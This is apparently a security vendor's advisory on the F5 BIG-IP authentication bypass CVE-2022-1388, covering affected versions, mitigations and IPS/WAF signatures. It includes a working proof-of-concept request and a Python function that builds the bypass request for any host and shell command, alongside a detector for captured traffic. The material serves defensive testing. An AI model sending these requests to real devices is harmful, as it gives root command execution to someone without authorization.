On May 18th, 2022, the Cybersecurity and Infrastructure Security Agency (CISA) and the Multi-State Information Sharing & Analysis Center (MS-ISAC) released a joint advisory on the remote code execution vulnerability CVE-2022-1388 in F5 BIG-IP products [1]. When exploited, CVE-2022-1388 allows attackers to execute arbitrary code and take control of affected devices.
Picus Labs has updated the Picus Threat Library with simulations for CVE-2022-1388 vulnerability exploitation attacks affecting F5 BIG-IP products.
Start simulating CVE-2022-1388 attacks with a 14-Day Free Trial of the Picus Platform
What Is the CVE-2022-1388 Vulnerability?
F5 Networks published information about the CVE-2022-1388 remote code execution vulnerability on May 4th, 2022 [2]. An unauthenticated adversary with network access may exploit the CVE-2022-1388 vulnerability to execute arbitrary commands through the management port or a self IP address.
The iControl REST endpoint "/mgmt/tm/util/bash" lets an authenticated administrator run shell commands as the root user of the BIG-IP. CVE-2022-1388 is an authentication bypass for this interface. iControl REST normally requires a valid X-F5-Auth-Token (or, for requests that appear to originate from the device itself, Basic authentication as the built-in admin user), but the front-end web server treats any header that is named in the Connection header as hop-by-hop and strips it before forwarding the request to the back end. An attacker who lists X-F5-Auth-Token in the Connection header therefore arrives at the back end with no token, as "admin", and with the password left unchecked. Anyone with network access to the management port or a self IP of an affected device can thus execute commands remotely with root privileges.
What Is the Impact of the CVE-2022-1388 Vulnerability?
48 of the Fortune 50 companies use F5 products. Due to this wide use, exploitation of CVE-2022-1388 may have serious consequences. Since the vulnerability allows unauthenticated attackers to execute arbitrary code on F5 BIG-IP products, the CVSSv3 base score for CVE-2022-1388 is 9.8 (Critical).
CVE-2022-1388 enables remote code execution on systems running vulnerable F5 BIG-IP versions and gives the attacker complete control of the affected device. For example, attackers can exploit CVE-2022-1388 to run malicious code and install webshells as backdoors on vulnerable systems to maintain access for post-exploitation.
Which F5 BIG-IP Versions Are Affected?
Affected and fixed F5 BIG-IP versions are shown in the table below:

Affected Versions | Fixed Version
16.1.0 - 16.1.2   | 16.1.2.2
15.1.0 - 15.1.5   | 15.1.5.1
14.1.0 - 14.1.4   | 14.1.4.6
13.1.0 - 13.1.4   | 13.1.5
12.1.0 - 12.1.6   | Not fixed (EOL)
11.6.1 - 11.6.5   | Not fixed (EOL)
What Is the Current Situation?
F5 released patches for the affected versions on May 4th, 2022, alongside its security advisory for the vulnerability. 17.x versions are not affected by CVE-2022-1388. Since versions 12.1.x and 11.6.x are end-of-life (EOL), no patches are available for them.
What Should You Do?
Since F5 BIG-IP is a widely used product and public proof-of-concept (PoC) code for exploiting CVE-2022-1388 is available, users are advised to patch their affected products without delay. For devices that cannot be patched immediately, including the EOL versions, F5's advisory lists temporary mitigations: blocking iControl REST access through self IP addresses, blocking it through the management interface, and modifying the BIG-IP httpd configuration. Note that the iControl REST interface should never be exposed to untrusted networks in the first place.
CVE-2022-1388 F5 BIG-IP PoC Exploit
The following conditions are required to exploit the CVE-2022-1388 vulnerability:
- A POST request must be sent to the vulnerable endpoint, which is "/mgmt/tm/util/bash"
- X-F5-Auth-Token must be present as a header
- Example: X-F5-Auth-Token: 0
- The "Authorization" header must use Basic authentication with the "admin" username; the password is not checked, so any password works.
- Example: Authorization: Basic YWRtaW46 (YWRtaW46 is the Base64 encoding of "admin:", i.e. username "admin" with an empty password, which is accepted as well)
- The "Connection" header must contain the "X-F5-Auth-Token" header field
- Example: Connection: X-F5-Auth-Token
- The "Host" header must be localhost / 127.0.0.1, or the "Connection" header must include "X-Forwarded-Host"
- Example: Connection: X-F5-Auth-Token, X-Forwarded-Host
- The value of the "command" parameter in the POST request must be "run"
- Example: "command": "run"
- The value of the "utilCmdArgs" parameter in the POST request holds the arguments that are passed to bash, typically "-c" followed by the Linux command to run.
- Example: "utilCmdArgs": " -c 'whoami' "
Therefore, you can test your F5 BIG-IP devices against CVE-2022-1388 exploitation with the following POST request. It satisfies every condition listed above and runs only a harmless whoami; do not send anything more intrusive to devices you are not authorized to test:

POST /mgmt/tm/util/bash HTTP/1.1
Host: localhost
X-F5-Auth-Token: 0
Authorization: Basic YWRtaW46
Connection: X-F5-Auth-Token, X-Forwarded-Host
Content-Type: application/json
Content-Length: 45

{"command":"run","utilCmdArgs":"-c 'whoami'"}

Example Code: Proof of Concept POST request for CVE-2022-1388 exploit
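The script below is an added example for this section; it is not code from the original post, from Picus, or from F5. It takes the exploit conditions listed above and uses them in both directions: build_probe_request() assembles the raw HTTP request byte for byte, so a tester can see exactly which headers do the work before sending it to a lab device with the TLS client of their choice, and cve_2022_1388_findings() applies the same conditions in reverse as a WAF-style check over a captured request, distinguishing the authentication-bypass hallmarks from a legitimately authenticated administrator who happens to call tm/util/bash. The host name, token values and all sample requests are constructed for illustration, and nothing here opens a network connection.

```python
"""Added example: build the CVE-2022-1388 probe request and detect it.

Not code from the original post, Picus or F5. Host names, token values and
the sample requests below are constructed; nothing is sent over the network.
"""
import base64
import binascii
import json
from typing import Dict, List, Set, Tuple

VULN_PATH = "/mgmt/tm/util/bash"


def build_probe_request(target_host: str, shell_cmd: str = "whoami") -> bytes:
    """Raw HTTP/1.1 request that satisfies every condition listed above.

    utilCmdArgs is what the endpoint hands to bash, hence the "-c '<cmd>'".
    """
    body = json.dumps({"command": "run", "utilCmdArgs": f"-c '{shell_cmd}'"})
    creds = base64.b64encode(b"admin:").decode()  # "YWRtaW46": user admin, empty password
    lines = [
        f"POST {VULN_PATH} HTTP/1.1",
        f"Host: {target_host}",
        "X-F5-Auth-Token: 0",  # any value works: the proxy strips it in transit
        f"Authorization: Basic {creds}",  # admin, with a password that is never checked
        # Naming these two headers in Connection makes the front-end web server
        # treat them as hop-by-hop and drop them, so the back end sees neither
        # a token to validate nor the real forwarded host.
        "Connection: X-F5-Auth-Token, X-Forwarded-Host",
        "Content-Type: application/json",
        f"Content-Length: {len(body)}",
    ]
    return ("\r\n".join(lines) + "\r\n\r\n" + body).encode()


def parse_request(raw: bytes) -> Tuple[str, str, Dict[str, str], str]:
    """Split a raw request into (method, path, lower-cased headers, body)."""
    head, _, body = raw.decode("latin-1").partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    parts = request_line.split(" ")
    method, path = parts[0], parts[1] if len(parts) > 1 else ""
    headers: Dict[str, str] = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def connection_tokens(headers: Dict[str, str]) -> Set[str]:
    """Header names the client asked the proxy to treat as hop-by-hop."""
    return {t.strip().lower() for t in headers.get("connection", "").split(",")}


def basic_auth_user(headers: Dict[str, str]) -> str:
    """Username from a Basic Authorization header, or "" if absent/invalid."""
    scheme, _, blob = headers.get("authorization", "").partition(" ")
    if scheme.lower() != "basic":
        return ""
    try:
        decoded = base64.b64decode(blob.strip(), validate=True).decode("latin-1")
    except (binascii.Error, ValueError):
        return ""
    return decoded.partition(":")[0]


def cve_2022_1388_findings(raw: bytes) -> List[str]:
    """Reasons a request looks like CVE-2022-1388 abuse (empty list = nothing seen)."""
    method, path, headers, body = parse_request(raw)
    findings: List[str] = []
    if method.upper() != "POST" or not path.startswith("/mgmt/"):
        return findings
    conn = connection_tokens(headers)
    if "x-f5-auth-token" in conn:
        findings.append("Connection names X-F5-Auth-Token as hop-by-hop: token stripped by proxy")
    if "x-forwarded-host" in conn:
        findings.append("Connection names X-Forwarded-Host: real Host hidden from back end")
    if "x-f5-auth-token" in conn and basic_auth_user(headers) == "admin":
        findings.append("Basic auth as admin combined with a stripped auth token")
    if path == VULN_PATH:
        try:
            payload = json.loads(body) if body else {}
        except json.JSONDecodeError:
            payload = {}
        if payload.get("command") == "run" and "utilCmdArgs" in payload:
            # Policy-level finding: legitimate admins can do this too.
            findings.append(f"tm/util/bash run invocation, utilCmdArgs={payload['utilCmdArgs']}")
    return findings


def is_cve_2022_1388_attempt(raw: bytes) -> bool:
    """True only for the bypass hallmark, not for ordinary admin use of util/bash."""
    method, path, headers, _ = parse_request(raw)
    return (method.upper() == "POST" and path.startswith("/mgmt/")
            and "x-f5-auth-token" in connection_tokens(headers))


# Constructed samples: a legitimately token-authenticated admin and a benign GET.
SAMPLE_ADMIN_BASH = (b"POST /mgmt/tm/util/bash HTTP/1.1\r\nHost: bigip.lab.example\r\n"
                     b"X-F5-Auth-Token: ABCDEF\r\nContent-Type: application/json\r\n"
                     b"Content-Length: 39\r\n\r\n{\"command\":\"run\",\"utilCmdArgs\":\"-c id\"}")
SAMPLE_LEGIT_GET = (b"GET /mgmt/tm/sys/version HTTP/1.1\r\nHost: bigip.lab.example\r\n"
                    b"X-F5-Auth-Token: ABCDEF\r\n\r\n")

if __name__ == "__main__":
    probe = build_probe_request("bigip.lab.example")
    print(probe.decode())
    for name, req in [("probe", probe), ("admin_bash", SAMPLE_ADMIN_BASH), ("legit_get", SAMPLE_LEGIT_GET)]:
        print(name, is_cve_2022_1388_attempt(req), cve_2022_1388_findings(req))
```

The detector keys on the Connection header rather than on the path alone because the util/bash invocation by itself is normal administrative traffic (the Snort POLICY-OTHER signature listed later in this post makes the same distinction from the RCE signature); a WAF rule that only matched the path would page on every legitimate admin script.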
How Does Picus Help Simulate and Prevent CVE-2022-1388 F5 BIG-IP Remote Code Execution Exploits?
We also strongly suggest simulating CVE-2022-1388 exploitation to test the effectiveness of your security controls, such as Web Application Firewalls (WAF), Intrusion Prevention Systems (IPS), and Next-Generation Firewalls (NGFW), against F5 BIG-IP RCE attacks using the Picus Complete Security Control Validation Platform. You can test your defenses against CVE-2022-1388 and hundreds of other commonly exploited vulnerabilities within minutes with a 14-day free trial of the Picus Platform.
Picus Threat Library includes the following threats for CVE-2022-1388 vulnerability:
Threat ID | Threat Name
97569     | F5 Web Attack Campaign
This threat in the Picus Threat Library also includes the following actions for previous F5 BIG-IP vulnerabilities:
CVE           | Threat Name
CVE-2020-5902 | F5 BIG-IP Local File Inclusion (LFI) Vulnerability
CVE-2020-5902 | F5 BIG-IP Remote Code Execution (RCE) Vulnerability
Moreover, Picus Threat Library contains 150+ threats containing 1500+ web application and vulnerability exploitation attacks in addition to 3500+ endpoint, malware, email, and data exfiltration threats as of today.
Picus also provides actionable mitigation content. The Picus Mitigation Library includes prevention signatures that address CVE-2022-1388 F5 BIG-IP RCE and other vulnerability exploitation attacks in preventive security controls. Picus Labs has validated the following signatures so far:
Security Control      | Signature ID                                                | Signature Name
Cisco Firepower NGFW  | 1.57336.3                                                   | POLICY-OTHER F5 iControl REST interface tm.util.bash invocation attempt
Cisco Firepower NGFW  | 1.59735.2                                                   | SERVER-WEBAPP F5 BIG-IP iControl remote code execution attempt
Cisco SourceFire IPS  | 1.57336.3                                                   | POLICY-OTHER F5 iControl REST interface tm.util.bash invocation attempt
Cisco SourceFire IPS  | 1.59735.2                                                   | SERVER-WEBAPP F5 BIG-IP iControl remote code execution attempt
Citrix Web App Firewall | 999945                                                    | web-misc apache http server authentication bypass vulnerability in ap_get_basic_auth_pw() via basic authorization headers
Forcepoint NGFW       | HTTP_CRL-F5-iControl-Rest-Unauthenticated-RCE-CVE-2022-1388 |
Forcepoint NGFW       | HTTP_CSH-Apache-HTTP-Server-Mod_rpaf-X-Forwarded-For-Denial-Of-Service |
Fortigate IPS         | 51543                                                       | applications3: F5.BIG-IP.iControl.REST.Authentication.Bypass
F5 BIG-IP ASM         | 200013045                                                   | BIG-IP iControl REST Authentication Bypass (3)
Snort IPS             | 1.57336.1                                                   | POLICY-OTHER F5 iControl REST interface tm.util.bash invocation attempt
Snort IPS             | 1.59735.2                                                   | SERVER-WEBAPP F5 BIG-IP iControl remote code execution attempt
Snort IPS             | 1.57336.3                                                   | POLICY-OTHER F5 iControl REST interface tm.util.bash invocation attempt
Trend Micro TippingPoint | 12639                                                    | HTTP: Apache HTTP Server X-Forwarded-For Denial-of-Service
Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Complete Security Control Validation Platform.